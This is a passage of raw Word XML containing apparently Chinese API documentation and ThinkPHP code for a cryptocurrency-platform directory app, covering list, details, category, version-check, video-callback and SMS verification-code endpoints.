    <w:p w14:paraId="6E4DA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introduction </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基础信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34413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ddress </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D1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symbol_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1023E6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score </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5042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market_value </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>市值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1EB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kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B30F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official_website_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官网地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61668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pp_download_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E484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lternate_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备用地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC172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service_charge_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务费地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A555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spot_trading </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>现货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0767C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futures </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>期货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32847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legal_currency </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>法币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1F278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otc_trading </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>场外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4B219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acebook facebook</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62035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weibo weibo</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662D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twitter twitter</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A27E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telegram telegram</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D95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E36F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122B2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6FAF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input('param.pages');    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AC7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ind=input('param.kind');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3E6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rray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178595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ind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC1D7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kind']=$kind;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797DD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latforms=Db::name('platform')-&gt;where($where)-&gt;order('id asc')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3C07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place_img=function($app){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E677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http(s)?:\\/\\/.+/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057304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logo']=preg_match($preg, $app['logo'])?$app['logo']:_imgUrl() . $app['logo'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28813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pp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F63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618D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latforms['data']=array_map($replace_img, $platforms['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F9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platforms);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED14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49F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1EA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platform/details </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A9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应用详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FEFF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应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA94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E44C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A360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d    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0D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CFCE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id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2FE3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name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01386C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ogo </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>logo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9585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etails </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F386F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ntroduction </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基础信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73256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ddress </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBB9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symbol_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA20D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score </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF8E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market_value </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>市值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697CB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official_website_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官网地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C49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pp_download_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE043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lternate_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备用地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C4A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ervice_charge_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务费地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E0F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spot_trading </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>现货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758865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futures </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>期货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0CADC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legal_currency </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>法币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02B79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otc_trading </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>场外交易</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不支持</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597428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acebook facebook</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584FF7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weibo weibo</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDAD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witter twitter</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD9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elegram telegram</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386E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6124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tails() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECF0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post.id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A298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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B29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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75280B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547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latform')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7DB4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6790E1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304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place_img=function($app){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2281C4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http(s)?:\\/\\/.+/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67677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pp['logo']=preg_match($preg, $app['logo'])?$app['logo']:_imgUrl() . $app['logo'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07150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pp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE66B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B8E0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replace_img($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C7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db['name_zh'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D38F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b);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14453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FA3F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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10425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B6AA1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B8C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platform/kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B8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应用分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3CC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应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49652A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92CE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240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 </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DCA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86A4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kind() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775EF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ind=db('platform')-&gt;field('kind')-&gt;group('kind')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12838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ray_filter(array_column($kind, 'kind')));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3D1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2FBB9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E0B0B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8D46C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7841B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controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBBDE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model\Send;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416050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26FEC3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Loader;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168DD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59DB8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683E0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1C374D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1097C9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2A22C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set_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DE2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Index extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799B95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0CDA6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4C7DE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14DCF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882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0F7D5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25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2A03E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47E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4A826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ABB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04835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C3F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446175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69D92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4B9EF5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2C4EF6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member_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5AEF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77924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41EC8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29D68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25F8A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4FE3D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71BC26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5A1213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7FE6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7FAE6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616479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8B8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C25E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BBBA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391103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5CD1D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79678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3BFD6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41994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302A45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A6BD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B6A0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43D2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92783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6BE2BD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74828D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F70A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301941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53F002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A0F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77C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626A3C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9B85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9704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46A1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65443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0446AE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906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A594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4739C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418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AAB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84E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banben()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075855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CC4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input('banben');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D38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 = '0.0.1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEEF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 == $b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D519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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前是最新版本</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD96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922BB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247CB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已有</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $b . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>新版本</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4A55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gt; 'http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C0A1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1367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7E94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073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guoApp()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606668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CEE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0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE7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925E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guoApp2()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3F3C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FCD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3848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rrors()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A545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9B42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1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42588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0211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3F723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2129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_ajaxError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624D4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A8D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notify()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497F4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18D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file_get_contents('php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394025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1.txt", var_export($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF8D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json_decode($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D35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44111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Id = $data['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E16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 $data['items']['0']['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F68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ersistentId &amp;&amp; $video) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF12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gt;where(['qiniu_video' =&gt; $persistentId, 'qiniu_video_type' =&gt; 1])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481C3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E587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 $db)-&gt;update(['qiniu_video_type' =&gt; 0, 'video' =&gt; $video]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221005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BB58E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F31D5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E7F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F3BE5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7CF2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F7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BBB96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67BD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32E5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924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72D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index/code </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>发送验证码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FFA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发送验证码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CDF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4DE82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E2CB3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username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E24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text      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证码类型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>找回密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>绑定</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A37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发送成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1DC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发送失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1595A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96DD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de()</w:t>
